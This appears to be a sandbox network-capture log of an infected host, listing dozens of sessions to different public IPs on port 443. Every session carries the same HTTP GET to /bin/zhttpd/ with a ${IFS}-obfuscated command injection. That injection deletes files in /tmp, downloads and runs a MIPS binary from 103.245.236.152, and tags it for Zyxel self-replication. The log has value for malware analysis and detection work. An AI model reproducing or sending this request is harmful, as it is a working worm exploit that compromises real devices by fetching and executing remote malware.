                                      Jan 14, 2024 15:50:59.609296083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7777192.168.2.1436236163.40.221.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609318972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7778192.168.2.144851253.46.241.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609353065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7779192.168.2.143538280.202.105.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609411001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7780192.168.2.1445454168.136.130.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609464884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7781192.168.2.143877473.26.219.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609504938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7782192.168.2.1443838124.165.162.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609541893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7783192.168.2.1454852108.15.168.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609580994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7784192.168.2.143313094.112.58.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609626055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7785192.168.2.145605453.162.63.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609653950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7786192.168.2.1460972130.226.20.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609711885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7787192.168.2.14436769.80.87.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609730005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7788192.168.2.1458652169.66.163.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609757900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7789192.168.2.144378851.147.132.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609781027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7790192.168.2.1449654143.166.129.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609831095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7791192.168.2.1460468103.166.173.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609875917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7792192.168.2.145141295.171.51.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609899998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7793192.168.2.1436436111.242.2.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.609935999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7794192.168.2.145429064.164.21.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610007048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7795192.168.2.144723694.138.207.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610038042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7796192.168.2.1438284122.202.43.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610083103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7797192.168.2.145177012.197.60.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610141993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7798192.168.2.1433674211.188.200.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610177040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7799192.168.2.1436294125.34.176.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610213995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7800192.168.2.1439694218.160.159.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610244989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7801192.168.2.1453072132.183.65.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610282898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7802192.168.2.1442220183.41.252.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610322952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7803192.168.2.1449848164.62.182.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610372066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7804192.168.2.1457962195.63.42.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610413074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7805192.168.2.144586851.225.127.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610441923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7806192.168.2.1459508158.160.33.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610495090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7807192.168.2.145345247.154.110.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610544920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7808192.168.2.1444284160.122.129.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610589027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7809192.168.2.1460246167.40.235.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610625029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7810192.168.2.1451442169.60.232.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610673904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7811192.168.2.1454166158.117.167.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610718966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7812192.168.2.143895882.35.2.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610749006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7813192.168.2.1453690216.119.189.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610807896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7814192.168.2.144328237.206.184.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610857964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7815192.168.2.143315446.217.192.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610913992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7816192.168.2.1450110105.93.224.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610960960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7817192.168.2.1455060212.235.171.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.610991001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7818192.168.2.143809645.174.115.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611053944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7819192.168.2.144138069.32.18.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611090899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7820192.168.2.1445106208.191.6.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611130953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7821192.168.2.1441102133.161.219.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611176968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7822192.168.2.145321852.176.48.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611227036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7823192.168.2.1454150188.94.129.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611279964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7824192.168.2.1457660185.213.88.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611306906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7825192.168.2.14421365.40.152.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611361027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7826192.168.2.1436030113.160.67.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611387968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7827192.168.2.1448110183.130.128.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611432076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7828192.168.2.145443235.192.2.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611485004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7829192.168.2.143981266.164.133.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611506939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7830192.168.2.1460694151.4.162.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611535072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7831192.168.2.145984034.219.180.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611558914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7832192.168.2.14408808.133.166.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611589909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7833192.168.2.1455140104.126.205.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611629009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7834192.168.2.1444564120.50.178.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611661911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7835192.168.2.1439898174.197.99.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611727953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7836192.168.2.144546844.85.132.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611780882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7837192.168.2.144109813.36.198.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:59.611819029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7838192.168.2.144483231.215.176.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:00.630259037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7839192.168.2.1454332219.209.119.23443
                                      TimestampBytes transferredDirectionData
